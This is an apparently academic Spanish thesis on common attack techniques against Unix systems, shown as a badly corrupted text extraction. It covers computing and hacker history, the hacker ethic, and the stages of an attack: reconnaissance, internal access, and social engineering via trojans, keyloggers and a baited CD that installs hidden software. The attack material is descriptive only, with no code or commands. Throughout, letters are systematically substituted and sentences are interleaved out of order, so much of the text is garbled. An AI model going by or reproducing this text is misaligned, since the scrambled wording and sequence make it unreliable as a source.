ás e9tensa que al co ienzo# un)a universidades# centros de investigaci8n ' entidades estatales de EE22H en tér inos de $ardIare# era un conjunto de *.. co "utadoras ;*** en arzo de *0++# ver 7lustraci8n 1> SA<!AUFF7T# la

a'or)a !5!(*. ' !5!(**. Fen)a varias a"licaciones ' "rotocolos estándar# co o

7lustraci8n 1% Ma"a l8gico de la A<!A@et ( Marzo de *0++ SCKBPE?T Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. O de 2*.

Ca")tulo *. ( *.1.A"arecen 2ni9 ' las

inico "utadoras

el correo electr8nico# los /oros de discusi8n ;2senet># la trans/erencia de arc$ivos ' $asta trá/ico de voz. 2ni9 /ue un suceso "orque el lenguaje C# aBos ás tarde# a /ines de los M+.# 'a $ab)a sido i "le entado en in/inidad de "lata/or as ' con/iguraciones de $ardIare distintas# "or su sencillez# /le9ibilidad ' velocidad# lo cual $izo que 2ni9 is o ;a esa altura# con varios aBos de desarrollo enci a> ' el so/tIare escrito "ara él /uera posi(le ejecutarlo en todo lu)ar donde un compilador / existiese.

7lustraci8n 5% Arbol de las di/erentes versiones de 2ni9 a lo largo del tie "o S47R7U:7@T. Ler ta bién otro árbol grá/ico aGn ás co "leto en S47R7U2AT

2n buen eje "lo de esto se dio a /ines de los M+.# cuando 5EC lanz8 la arquitectura BAC# que se diseBo co o e9tensi8n ' evoluci8n a -2 bits de la anterior !5!(**. F$o as B. :ondon ' Jo$n F. <eiser escribieron un docu ento al res"ectoS2ni9-2vT de donde la siguiente /rase resu e el trabajo de llevar 2ni9 a la LAA# lla ado 2ni9&-2L% C%ork on t e & compiler began in mid'(ecember
Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 0 de 2*.

Ca")tulo *. ( *.1.A"arecen 2ni9 ' las

inico "utadoras

)*++, - e ard.are arrived on /arc 0, %e eld a part1 on /a1 )* to celebrate successful multiuser operation of t e s1stem,D ;CEl trabajo en el co "ilador C co enz8 a ediados de 5icie bre de *0++. :a áquina lleg8 el - de Marzo. Fuvi os una /iesta el *0 de Ma'o "ara celebrar el e9itoso /unciona iento ultiusuario del siste aD>. Eje "los co o este*1 su"usieron un gran ca bio de "aradig as en la in/or ática% todo so/tIare escrito "ara 2ni9 "odr)a correr en di/erentes "lata/or as# en cualquier lu)ar. =asta ese antes ! un después de Unix ! el len)uaje /. o ento# el so/tIare era alta ente de"endiente de la arquitectura en la cual se ejecutaba. Es "or esto que 9u(o un

*1 El trabajo tal co o se lo describe no a"rovec$aba co "leta ente la nueva arquitectura LAA# "ero es una uestra de lo relativa ente si "le que era llevar un siste a o"erativo ' su conjunto de $erra ientas a nuevas arquitecturas. !osterior ente# en *0+0# estudiantes de la 2niversidad de Ber6ele' "ublicaron -B,5 ;B,5 "or Ber6ele' ,o/tIare 5istribution># que era una versi8n de 2ni9&-2L que a"rovec$aba co "leta ente las nuevas ca"acidades de la LAA. 5e aqu) en nivel global. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *. de 2*. ás# la 2niversidad de Ber6ele' /ue una de las versiones de re/erencia de 2ni9 a

Ca")tulo *. ( *.5.:as

icroco "utadoras% Co "utadoras !ersonales

*.5. :as

icroco "utadoras% Co "utadoras !ersonales
itad de los aBos M+.# la iniaturizaci8n de los e oria# enor

!or otra "arte# en la segunda

co "onentes necesarios "ara crear un equi"o de c8 "uto ;"rocesador#

edios de al acena iento# etc.> "er iti8 que una nueva corriente de j8venes e9"ertos se interesara "or crear dis"ositivos "oderosos ' /le9ibles en el ta aBo "osible% se las deno in8 microcomputadoras "ri ero ' 9ome computers ;co "utadoras Cde casaD> o personal computers ;co "utadoras "ersonales> des"ués. !equeBos clubes de /anáticos ;Hobb1ists &lubs2 de la electr8nica ' co "utaci8n co enzaron a surgir# aco "aBados "or el es"acio dedicado en las "ublicaciones co o Popular 3lectronics, El Homebre. &omputer &lub
S47R7U=CCT

/ue la cuna

ás relevante de estos $ac6ers# ' desde all)# A""le /ue la

"ri era e "resa conocida ' abocada a "roducir siste as de este ti"o# con ,teve 4oznia6 ' ,teve Jobs a la cabeza. Bill Pates ' !aul Allen# si bien no /ueron ie bros de este club# /ueron "arte de esta corriente ' desarrollaron su "ri er ' e9itoso "roducto% el lenguaje 4ltair 5asic# que se volvi8 el lenguaje estándar "ara la "rogra aci8n de las icroco "utadoras. Cali/ornia, ,in e bargo# vale la "ena dejar en claro que este nuevo ovi iento estaba u' in/luenciado "or la "osibilidad de $acer negocios con las e "resas tradicionales ' llevar la co "utaci8n a la gente no técnica# ' aqu) no todos sus ie bros "ertenec)an a la co unidad $ac6er clásica# "or su cultura# ética ' co "orta iento. !or eje "lo# so=t@are# tanto "ara uc$os estaban en contra de compartir el ejora co o investigaci8n# ' eran "artidarios de crear un En los aBos subsiguientes este gru"o de $ac6ers ' sus e "rendi ientos dieron origen al conocido Silicon Valle1 ;Lalle del ,ilicio># en

odelo de licencias ' so"orte e "resarial# cerrando el ca ino a la innovaci8n co o se ven)a dando "or los CviejosD $ac6ers.

*.J. :os aBos MO.# M0. ' el F:?,,
En resu en# a "rinci"ios de los aBos MO.# la co unidad de e9"ertos de la co "utaci8n estaba dividida en di/erentes corrientes ' tecnolog)as%

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. ** de 2*.

Ca")tulo *. ( *.J. :os aBos MO.# M0. ' el F:?,,

a> :os $ac6ers del 7F, ' las !5!(*.. b> :os $ac6ers de 2ni9# el lenguaje C# ' las !5!(**&LAA. c> :os $ac6ers de las co "utadoras "ersonales. :os aBos MO. transcurrieron entre uc$)si os ca bios ' avances ezclados ostrar sus aBos#

tecnol8gicos. ,i bien los $ac6ers del 7F, ' las !5!(*. 'a estaban algo con los de 2ni9 ' las !5!(**# 'a que su tecnolog)a e "ezaba a conocido co o el C!ro'ecto JG"iterD.

ta bién es"eraban ansiosa ente la nueva encarnaci8n co "atible de la !5!(*.# !ero no result8 co o es"eraban. A "esar de que estaba en buena /or a# en *0O- 5EC cancel8 el "ro'ecto# "ara concentrarse Gnica ente en la l)nea LAA de inico "utadoras# que 'a era i "le entaci8n ' é9ito. ?tro u' redituable econ8 ica ente# ' con aBos de otivo de 5EC acerca de esto /ue que un sucesor ercado '

de la !5!(*. ter inar)a co "itiendo con LAA# con/undiendo al is o so/tIare ' "ro'ectos que los nucleaba no era "ortable.

dividiendo sus es/uerzos. Esto signi/ic8 el /in del 7F, ' su cultura# 'a que el As) /ue co o el siste a o"erativo B,5 2ni9 sobre la arquitectura LAA# conectada a la A<!A@et ;'a aislada de entidades aBos la a'or)a de los $ac6ers del "ri er gru"o /ueron ilitares ' utilizando el igrando a él. "rotocolo FC!&7!># /ue el siste a de $ac6eo Cpor excelenciaDSE<==T# ' con los ,in e bargo# el que alcanz8 el é9ito /ue la tercera corriente tecnol8gica# con sus "roductos alcanzando la co "leta vertiginosa# asividad# /a a ' /ortuna ;"or eje "lo# la u' !C de 7BM ' el M,(5?,># con sus co "aB)as creciendo en /or a resto ;$ec$o conocido co o la CPuerra de los 2ni9DS47R7U24T>. ,in e bargo# es de destacar que segGn Eric <a' ondSE<==T# si bien $acia /ines de los MO. los entusiastas de las 8rdenes de icroco "utadoras crecieron en varios agnitud con res"ecto a la cultura $ac6er# nunca se convirtieron en

ientras que 2ni9 se debat)a entre la versi8n de AFWF# la B,5 ' el

una comunidad con conciencia propia. @unca desarrollaron una tradici8n co Gn de jerga# /olclore ' $istoria en co Gn. Liendo que 2ni9 estaba siendo disgregado# co ercializado "or grandes e "resas co o so/tIare cerrado ;"ro"ietario> ' de este odo "erdiendo su ClibertadD ;as) vista "or él># <ic$ard ,tall an cre8 el "ro'ecto P@2SP@2T en *0O' la F,FSF,FT en *0O5 ;Free Soft.are Fundation# Fundaci8n de ,o/tIare :ibre>.
Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *2 de 2*.

Ca")tulo *. ( *.J. :os aBos MO.# M0. ' el F:?,,

El "ro'ecto P@2 a"untaba a crear una "lata/or a ;,iste a ?"erativo ' conjunto de utilidades> de so/tIare co "atible con 2ni9 de libre uso# las décadas anteriores*5. Ka en los aBos M0.# el "ro'ecto P@2 ten)a uc$as $erra ientas desarrolladas# e9tendidas ' de calidad# "ero segu)a /altando un nGcleo "ara su ,iste a ?"erativo# 'a que se segu)a de"endiendo de versiones co erciales de 2ni9 "ara utilizarlas. Cuando lleg8 el o ento en que las !Cs /ueron su/iciente ente "oderosas# era cuesti8n de tie "o el que algGn conjunto de $ac6ers llevara una versi8n de 2ni9 a esta "lata/or a tan e9tendidaH as) /ue co o :inus ForvaldsS47R7U:FT desarroll8 :inu9SRernT# junto a un nG ero cada vez a'or de $ac6ers# sie "re con la red de "or edio. a'or# ' aun8 a un Linux =ue el comien3o del resur)imiento de la comunidad 9ac:er. El ,o/tIare :ibre ;F:?,,> /ue creciendo a un rit o cada vez nG ero creciente de $ac6ers alrededor del Co o conclusi8n# lo undo. odi/icaci8n ' distribuci8n# tal co o la co unidad $ac6er estaba acostu brada a $acerlo durante

ás i "ortante del ca ino recorrido $asta aqu) es que

varias )eneraciones de 9ac:ers nacieron ! crecieron conectados a la red DAR4ANet al principio e Internet lue)oE% ! el o(jeto de su actividad creativa ! de investi)aci-n )ira(a alrededor ! )racias a ella. La red los uni-% los 9i3o crecer% desarrollarse% aprender% compartir% es decir% ser 9ac:er si)ni=ica en cierta =orma >estar? en la red aportando al)o a ella. Es "or eso que el $ac6er está tan asociado e identi/icado con el a"rovec$a iento ' e9"lotaci8n de vulnerabilidades# la obtenci8n de in/or aci8n re ota# investigaci8n de dis"ositivos conectados# es decir# 9ac:ear en la red.

*5 Cabe resaltar que ,tall an "ertenec)a a la generaci8n de $ac6ers del 7F, ' de las !5!(*.. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *- de 2*.

Ca")tulo 2. ( Ca")tulo 2. El Ataque de siste as in/or áticos

/ap6tulo +. Fl Ataque de sistemas in=ormáticos
2.*. El @egocio de la ,eguridad en la Actualidad
Foda 9erramienta poderosa co o un equi"o de c8 "uto "uede ser u' necesaria ' Gtil "ara tareas con /inalidades co o la investigaci8n# ad inistraci8n# diseBo# todos objetivos que contribu'en al desarrollo de un objeto de estudio. !ero ta bién puede ser empleada con =ines no éticos# co o "or eje "lo el desarrollo de ar as ' co "onentes qu) icos daBinos "ara el ser $u ano. =o' en d)a# atacar un siste a o equi"o in/or ático# es visto co o algo decidida ente C aloD "or uc$a gente ajena a la in/or ática. ,in e bargo# co o anera de "robar la robustez ' la otivos># no de co "robar la u' baja se $a descri"to anterior ente# desde los inicios de la co "utaci8n# atacar o vulnerar equi"os era considerado co o una escalabilidad de un siste a ;entre seguridad en s) del uc$os otros

is oH las redes e9ist)an# "ero eran "ocas ' de

velocidad. :os grandes co "utadores do inaban la escena de las cor"oraciones ' la con=ian3a en el so/tIare que se ejecutaba ' en las redes ' actores que coo"eraban era al)o com'n# que se daba "or sentado. XVué es lo que ca bi8# que $o' en d)a los delitos in/or áticos ;o la idea de que> son tan co unesY Muc$o. Al e9tenderse la tecnolog)a ;e 7nternet en los Glti os aBos> en el creando virus# undo# la se)uridad en (ase a la con=ian3a =ue dejando paso al so=t@are especiali3ado% expertos en se)uridad in=ormática ! crac:ers alIare# atacando siste as en l)nea ' robando in/or aci8n '&o ercado de la seguridad in/or ática undo ' no tiene l) ites dinero de los usuarios o de las e "resas. El visibles a ediano "lazo.

está viviendo una eta"a de gran creci iento en todo el

2.2. El =ac6ing Etico
5esde el "unto de vista estricta ente de la co unidad in/or ática# la e9"eri entaci8n e investigaci8n# el >9ac:eo?% está (ien visto% siempre ! cuando la actividad respete la ética 9ac:er. :a ética $ac6er se basa en estos "rinci"ios# introducidos "or ,teven :ev'
S:ELKU=ACRT#

en *0O1%

Access to computers and anything which might teach you something about the way the world works should be unlimited and total. Always

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *1 de 2*.

Ca")tulo 2. ( 2.2. El =ac6ing Etico

yield to the Hands-On Imperative! % El acceso a las co "utadoras ' cualquier cosa que "ueda enseBarle algo acerca de c8 o /unciona el undo deber)a ser ili itado ' total. ,ie "re r)ndase al i "erativo de CZManos a la ?bra[D. C:os $ac6ers creen que las lecciones esenciales acerca de los siste as ' del undo "ueden ser a"rendidas aislando las cosas# viendo c8 o ás /uncionan# ' utilizando este conoci iento "ara crear nuevas ' $asta

interesantes cosas. Ellos se o/enden de cualquier "ersona# barrera /)sica# o le' que intente evitar que ellos $agan esto.D S...T C:as reglas que le i "idan to ar las cosas de esta /or a en sus "ro"ias rid)culas "ara siquiera res"etarlas.D

anos son de asiado

All information should be free% Foda la in/or aci8n deber)a ser libre. Es decir# todo e9"eri ento e investigaci8n deber)a ser "Gblica ' de libre conoci iento# as) co o sus resultados. C,i usted no tiene acceso a la in/or aci8n que necesita "ara ejorar las cosas# XC8 o "uede arreglarloYD S...T CEsto evita el te eroso ritual de la "érdida de tie "o reinventando la rueda% en vez de que todos escriban su "ro"ia versi8n del is o "rogra a# la ejor versi8n estar)a dis"onible "ara todos# ' todos ejorar eso.D deber)an ser libres de "ro/undizar en el c8digo '

Mistrust Authority !romote "ecentrali#ation% 5escon/)a de la autoridad# "ro ueve la descentralizaci8n. C:a ejor anera de "ro over el libre interca bio de in/or aci8n es teniendo un siste a abierto# algo que no "resente l) ites entre un $ac6er ' una "ieza de in/or aci8n o un ele ento de un equi"a iento que necesita en su bGsqueda del conoci iento# ejora ' tie "o en l)nea. :a Glti a cosa que necesita es burocracia. :as burocracias# sean cor"orativas# del gobierno o universitarias# son siste as de/ectuosos# "eligrosos# de anera que no "ueden ada"tarse al i "ulso e9"loratorio de los verdaderos $ac6ers.D

Hackers should be $udged by their hacking not bogus criteria such as degrees age race or position% :os $ac6ers deber)an ser juzgados "or lo que $acen ;$ac6ear># no "or /alsos criterios co o t)tulos# edad# raza o "osici8n. C:a gente que acced)a ;a donde estába os> ' que "arec)an ostrar credenciales i "resionantes no eran to adas en cuenta seria ente $asta que se "robaban a s) is os en la consola ;ver "ág. +# nota al "ie nro.*2>

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *5 de 2*.

Ca")tulo 2. ( 2.2. El =ac6ing Etico

de una co "utadora. Este rasgo meritocrático no está necesaria ente basado en la bondad in$erente de los corazones de los $ac6ers# sino que "rinci"al ente les i "orta "otencial de

enos sus caracter)sticas su"er/iciales que su

ejorar el estado general del $ac6ing...D ás corto deber)a ser ad irado

%ou can create art and beauty on a computer% 2sted "uede crear arte ' belleza en una co "utadora.DEl "rogra a "or co "aBeros $ac6ersDS...T C=a' de/initiva ente un i "ulso art)stico dentro de aquellos que "ueden utilizar esta técnica de genio( arciano# de una calidad visionaria que los $abilita a descartar el "unto de vista actual ' establecer# de una /or a total ente ines"erada# un nuevo algorit oD. &omputers can change your life for the better% :as co "utadoras "ueden ca biar su vida "ara ejor. 'ike Aladdin(s lamp you could get it to do your bidding% Co o la lá "ara de Aladino# usted "uede so eter a la co "utadora co "leta ente a sus 8rdenes. C,egura ente cualquiera "odr)a bene/iciarse al e9"eri entar este "oder. ,egura ente cualquiera "odr)a bene/iciarse de un undo basado en la Etica =ac6er. Esta era la creencia i "l)cita de los $ac6ers...D. =a' otra "ublicaci8n ás reciente# que vale la "ena citar# donde el iran C"uertas adentroD '

is )si o :inus Forvalds junto a otros escritores se e9"lican la

otivaci8n de los $ac6ers ' su co unidad# su /or a de ver las cosas '

su ética% C- e Hacker 3t ic and t e Spirit of t e 6nformation 4ge DS=ACRUEF=7CT ;C:a Etica =ac6er ' el Es")ritu de la Era de la 7n/or aci8nD>. En resu en# si bien en *0O1# cuando estos "rinci"ios $asta ese con el "ro'ecto P@2H la Etica =ac6er 'a estaba "resente en la =ac6er ' en "ráctica durante alrededor de 25 aBos# dieron origen al del ,o/tIare :ibre de $o' en d)a. Fa bién sus tecnolog)as i "ortant)si as aGn en nuestros d)as ;' el "rotocolo FC!&7!# Et$ernet# C ' 2ni9 o ento tácitos /ueron "uestos en "a"el ' <ic$ard ,tall an recién co enzaba su cruzada a'or)a de la ovi iento co unidad de e9"ertos in/or áticos. Estos "rece"tos# /ruto de la lla ada Cultura ie bros desarrollaron

u' usadas "or cierto># co o uc$)si as técnicas

is o. :os tests de "enetraci8n

;Cpenetration testingsD># los exploits# la ingenier)a reversa# ' $ac6ers $ace ás de 2. aBos.

ás que estarán o no "resentes en este docu ento /ueron desarrolladas "or

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *J de 2*.

Ca")tulo -. ( Ca")tulo -. Eta"as F)"icas de un Ataque

/ap6tulo ;. Ftapas T6picas de un Ataque
2na vez descri"tos los or)genes ' las intenciones de los $ac6ers# se "uede co enzar a describir el t)"ico ' genérico "roceso de vulnerar la in/raestructura in/or ática de una entidad. Cabe resaltar que e9isten in/initas se "ueden describir las siguientes eta"as% aneras ' co binaciones de $acerlo# donde si bien no todas recorren este ca ino# en general

7lustraci8n J% Eta"as \t)"icas\ de un Ataque

Co o "uede verse en la ilustraci8n# los ataques a deter inados siste as suelen ser "lani/icados# es decir% el atacante en "ri era instancia busca un cierto objetivo# luego obtiene in/or aci8n general de la estructura de red# versiones de so/tIare# etc. ' "osterior ente utilizará una estrategia# a"licando una o general ente varias técnicas "ara vulnerar el siste a. !robable ente en algGn o ento busque algo de anoni ato "ara $acer sus áquinas intro isiones# "or eje "lo utilizando una red "Gblica# un ejército de

C$ombieD# uno o varios siste as inter edios# o un siste a interno ;es decir# desde dentro de la organizaci8n> desde donde co "ro eter a otros siste as internos. :uego# segGn se desee# se "ueden li "iar los rastros# o recurso obtenido antener el control del ediante C"uertas traserasD o rootkits# ' luego a"rovec$ar el

siste a co "ro etido "ara CsaltarD a otro objetivo ;quizás# el objetivo original>. Es i "ortante re arcar que esta tendencia de ataques "lani/icados ' "ersonalizados se encuentra en au ento# debido a la creciente di/icultad de encontrar una Gnica anera de vulnerar un siste aH la red es cada vez ás $eterogénea ' evidente ente la /alsa sensaci8n de seguridad de $ace algunos aBos oblig8 a que los ad inistradores de siste as ' "rogra adores tuvieran co o
Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *+ de 2*.

Ca")tulo -. ( Ca")tulo -. Eta"as F)"icas de un Ataque

a'or "rioridad la tolerancia a /allos# esque as de seguridad# bac6u" ' e ergencia# "or no brar algunas edidas co unes. ,egGn el ,A@,*J# "ara el aBo 2..+ los ataques in/or áticos con objetivos bien de/inidos ' "lani/icados se encuentran en el cuarto "uesto dentro un in/or e acerca de las *. tendencias
S,A@,UF?!*.T.

ás i "ortantes en cuanto a seguridad del 2..+

K agrega*+% C:os ciber(ataques dirigidos de naciones en contra de los siste as de gobierno de los Estados 2nidos $an sido enor e ente e9itosos en los Glti os tres aBos# de ostrando el /racaso del gobierno /ederal en cuanto a actividades de seguridad. S...T :os ataques "lani/icados a organizaciones co erciales se dirigirán a contratistas valiosa de sus clientesD. ilitares ' negocios con in/or aci8n u'

-.*. !lani/icaci8n ' elecci8n del objetivo
Co o se dijo antes# la tendencia actual de los ataques a entidades es que se "lani/ican "revia ente# no son al azar. ,in e bargo# es bueno destacar que# de acuerdo a la "lani/icaci8n que se $aga# "uede que el ataque s) involucre ele entos ás o enos aleatorios# co o "or eje "lo# el ar ado de redes de áquinas Czo biesD "revio Crecluta ientoD de usuarios de internet incautos# "ara luego s) dirigirlos a un objetivo en concreto. Fa bién es "robable que "ara llegar al CobjetivoD "rinci"al# se va'an obteniendo ciertos "rivilegios a lo largo del ca inoH es enos custodiados ' uc$o ás co Gn que tenga é9ito un ataque "lani/icado# basado en conquistar objetivos secundarios# ás vulnerables# "ara luego ir "or el Cgran "re ioD.

-.2. ?btenci8n de in/or aci8n
A esta eta"a ta bién se la suele deno inar Csegui iento de $uellasD ;footprinting># 'a que co o bien se "uede su"oner# se trata de una averiguaci8n
*J ,A@, 7nstitute % A'sAd in# Audit# NetIor6ing# and Aecurit' ;7nstituto de Ad inistraci8n de ,iste as# Auditor)a# <edes ' ,eguridad>. $tt"%&&III.sans.org&. Es un instituto reconocido en todo el undo es"ecializado en ,eguridad 7n/or ática. *+ C1. -argeted c1ber attacks b1 nation states against US government s1stems over t e past t ree 1ears ave been enormousl1 successful, demonstrating t e failure of federal c1ber securit1 activities, 7,,,8 -argeted attacks on commercial organi$ations .ill target militar1 contractors and businesses .it valuable customer information,D Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *O de 2*.

Ca")tulo -. ( -.2.?btenci8n de in/or aci8n

no intrusiva de todos los as"ectos técnicos# $u anos ' culturales de la organizaci8n. Fa bién algunos e9"ertos la deno inan C<econoci iento !asivoD ;9Passive :econnaissance;2# ' resaltan su i "ortancia en todo el "roceso de ataque. ,egGn Eric Cole ;S=ACRUBE4T# "ág. -J>% CEn algunos casos# el reconoci iento "asivo "uede "roveer todo lo que un atacante necesita "ara obtener acceso. En "ri era instancia "odr)a "arecer que no es tan Gtil# "ero no sobresti e la cantidad de in/or aci8n que un atacante "uede adquirir si es realizado correcta ente. :os ataques "asivos*O# "or naturaleza# "ueden no "arecer tan "oderosos co o los activos*0# "ero en algunos casos "ueden ser algo ejor% acceso garantizado entre varias avenidas2.D. ás "oderosos. Con los ataques "asivos# usted no obtiene acceso directo# "ero a veces usted $asta obtiene

-.2.*. 5esde /uera de la organizaci8n
Peneral ente# la investigaci8n del objetivo suele co enzar s8lo teniendo acceso e9terno a la organizaci8nH es co Gn tratar de averiguar qué ecanis os de uc$as acceso se "ueden utilizar "ara intentar acceder a sus redes ' servicios# ' una vez all)# acceder al objetivo. @or al ente el acceso es s8lo v)a internet# "ero entidades "roveen ta bién acceso re oto% tele/8nico ;Cdial'upD># noteboo6s de e "leados que llevan trabajo a sus $ogares# redes Iireless ;estando cerca geográ/ica ente># etc. Es "or esto que toda in=ormaci-n acerca de la e "resa# "or eje "lo# telé/onos# direcciones# o/icinas# e "resas clientes# socios# "roveedores# no bres e in/or aci8n de e "leados ;o e9(e "leados># eventos# ' i "ortancia en esta "arte# donde e9clusiva ente se releva la in/or aci8n# "ara luego utilizarla en /or a intuitiva e ingeniosa. :as "rinci"ales /uentes de in/or aci8n acerca de una entidad son%

uc$o

ás# son de

a'or cantidad de

&ases de Datos ;"Gblicas o no># dis"onibles en internet# o en

anos

*O Eric Cole utiliza Cataque "asivoD ' Creconoci iento "asivoD de /or a indistinta ' co o sin8ni os. 5e $ec$o# le da la categor)a de CataqueD a algo que es in/or aci8n# justi/icándolo tal co o se transcribe. *0 :os ataques activos se utilizan "ara re/erenciar la secci8n *.-.-. 2. CavenidasD en dic$a /rase es una etá/ora de siste a&red "ro"ia de la organizaci8n. era ente una bGsqueda de

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *0 de 2*.

Ca")tulo -. ( -.2.?btenci8n de in/or aci8n

"rivadas a las que el atacante tiene accesoH "or eje "lo# el "adr8n de votantes de la Argentina es u' sencillo de conseguir en la red. K brinda in/or aci8n de Fi"o ' @G ero de 5ocu ento# 5irecci8n# @o bre co "leto# se9o# estado civil ' /ec$a ' lugar de naci iento# de cada votante de Argentina# que "ueden ser usados a anera de identi/icaci8n "or usuarios de siste as con acceso desde 7nternet.

1otores de &'squeda. Buscadores co o Poogle ' Ka$oo "er iten encontrar en segundos una criterio es"ec)/ico. Es ultitud de "áginas que coincidan con un ás# los atacantes suelen a"rovec$ar varios

ele entos de bGsqueda dis"onibles en el buscador que co binados les "er ite au entar el /actor de é9ito de /or a considerable.

Ao=t@are especiali3ado. E9iste so/tIare que con a'uda de los dos ele entos anteriores co bina ' trans/or a un dato es"ec)/ico en una CredD de resultados "osible ente relacionados# con cierta inteligencia.

-.2.2. 5esde dentro de la organizaci8n
,i de alguna anera se tiene acceso desde dentro de la organizaci8n a los objetivosH es decir# teniendo "or eje "lo el control de alguna estaci8n de trabajo con o sin "er iso# desde donde se accede al siste a v)a red "or eje "lo# las "robabilidades de é9ito au entan considerable ente. @o es casual que el O.] de los ataques e9itosos "rovengan de una red interna al servicio que se co "ro ete
S=ACRUBA,7C,T.

:a ventaja está dada en que el siste a debe "er itir el acceso a

este nodo# a di/erencia de los que residen /uera de la red de la organizaci8n. Ade ás de las "osibilidades de obtener in/or aci8n del "unto anterior# aqu) las "osibilidades se a "l)an sustancial ente# entre las encuentran%
● ●

ás co unes se

Fscuc9ar2* trá=ico de otros componentes de la red. Acceder a la in=ormaci-n del equipo ! la que se encuentra disponi(le en vol'menes compartidos de la red% e( ails# docu entos# contraseBas# listados de usuarios# arc$ivos# bases de datos# registros# cualquier dato que "ro"orcione aneras de ingresar al siste a objetivo.

2* CEscuc$ar el trá/icoD

ás co Gn ente se dice en la jerga Cesni/earD# 'a que el verbo en inglés

es Csni//D# que signi/ica C$us earD# u ColerD. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 2. de 2*.

Ca")tulo -. ( -.2.?btenci8n de in/or aci8n

-.2.-. 7ngenier)a ,ocial
:a ingenier)a social es quizás uno de los ás di/)ciles ele entos de control "or "arte de las organizaciones# 'a que se a"rovec$a del co "onente $u ano# sie "re involucrado en alguna eta"a ;si no en todas> de la o"eraci8n de los siste as. Fal co o lo a/ir a el a/a ado $ac6er Revin Mitnic6 en su libro CEl arte del EngaBo N Controlando el Ele ento =u ano de la ,eguridadDSRMUA?5T# CFl =actor 9umano es verdaderamente el enlace más dé(il de la se)uridadD. :a ingenier)a social se "uede de/inir co o Ctodo atacante trata de "ersuadir# siste a objetivo# quizás acceder al objetivoD. 2na breve enu eraci8n de los
● ● ● ● ● ●

étodo "or el cual un

ani"ular o engaBar a una "ersona relacionada con el enos estar ás cerca de

intiendo ;o no># con el objetivo de quitarle algGn dato o

ele ento de in/or aci8n que "er ita acceder o al étodos inclu'e%

:la adas tele/8nicas. Mensajes de te9to. ,esiones de c$at o diálogos v)a Env)o de correos electr8nicos. Lisitas "ersonales Env)o e 7nstalaci8n de "rogra as en !Cs de e "leados de la entidad# co o "or eje "lo%

ensajer)a instantánea.

,"'Iare% obtienen in/or aci8n de uso# $ábitos# $istorial de navegaci8n# ' lo re"ortan a un sitio central. Fro'anos% 2n "rogra a del ti"o CCaballo de Fro'aDS47R7UF<?KT# es un "rogra a que a"arente ente cu "le cierta /uncionalidad# "ero que sin que el usuario lo se"a utiliza el equi"o con otros /ines. !uede ser utilizado "or el ingeniero social "ara instalar "uertas traseras ' conseguir acceso local a la red objetivo# instalar un 6e'logger# etc. 2n 6e'logger ca"tura las contraseBas ' todo lo que ti"ee el usuarioH "uede enviarlas a un sitio re oto o si el intruso tiene acceso local# llevarse el registro en edios de al acena iento "ortátiles.

Peneral ente $aciéndose "asar "or otra "ersona# el atacante utiliza in/or aci8n obtenida anterior ente "ara "ersuadir a una "ersona de que le "rovea cierta in/or aci8n# o que se dirija a una "ágina Ieb en "articular ' llene un
Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 2* de 2*.

Ca")tulo -. ( -.2.?btenci8n de in/or aci8n

/or ulario# o que le env)e un /a9 con ciertos datos# etc. :as "osibilidades ' situaciones son casi in/initas# ' los estudios al res"ecto son alar antes "ara toda entidad "reocu"ada "or su seguridad S7,?CU,FAFT# donde se re/leja lo sencillo que es conseguir in/or aci8n ás o enos sensible de la a'or)a de los usuarios. !ara eje "li/icar# un "osible intruso# "ara conseguir acceso a la estaci8n de trabajo de un e "leado de una e "resa# "odr)a enviarle "or correo tradicional a su escritorio un "en drive# C5# etc. de regalo# de alguna e "resa cliente# "ara que lo vea. :uego# el e "leado inserta el C5 dentro de la co "utadora de su trabajo ' ejecuta la "resentaci8n# que ade ás de ostrarle la salutaci8n "ara "asar desa"ercibido# instala ta bién un "rogra a oculto que env)a in/or aci8n del equi"o al atacante v)a internet# to ando el control de su equi"o# ' sirviendo de "uerta de entrada a toda ;o "arte al enos de> la red de la e "resa.

-.-. BGsqueda ' rastreo de vulnerabilidades.
En esta eta"a es donde el atacante establece de /or a activa co unicaci8n con el objetivo# segura ente tratando de "asar desa"ercibido "ara el ad inistrador. 2sual ente se dis"one de un CarsenalD de $erra ientas "ara $acerlo# 'a que aGn no sabe con "recisi8n con qué se va a encontrar. Estas $erra ientas suelen desarrollarse "or gru"os de $ac6ers ' distribuidas "or 7nternet libre ente22# a"rovec$ando alguna debilidad en "rotocolos# nor as u o"eratorias. Cuanta e9"eriencia tenga en el /unciona iento interno de los organizaci8n. is os# ás ás "robabilidad

tendrá el intruso de "oseer# desarrollar o conseguir vulnerar la in/raestructura de la

-.-.*. Acceso :ocal
En cuanto a la bGsqueda de vulnerabilidades en /or a local# cabe destacar que si el atacante tiene acceso /)sico al objetivo ;un servidor# "or eje "lo> $abiendo sorteado el esque a de seguridad de la entidad# se considera que todo es=uer3o por prote)er la in=ormaci-n es en vano. Mic$ael Pregg ;S=ACRU,FACRT# "ág. -J2> escribi8 sobre este te a% CCasi
22 ,i bien estas "iezas de so/tIare "ueden "arecer de Cética dudosaD "ara ateria# en realidad suelen ser utilidad tanto "ara /ines continua e investigaci8n. @o $a' que olvidar esta idea del uc$a gente ajena a la ejora alos co o "ara /ines de de/ensa# undo $ac6er# la libertad.

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 22 de 2*.

Ca")tulo -. ( -.-.BGsqueda ' rastreo de vulnerabilidades.

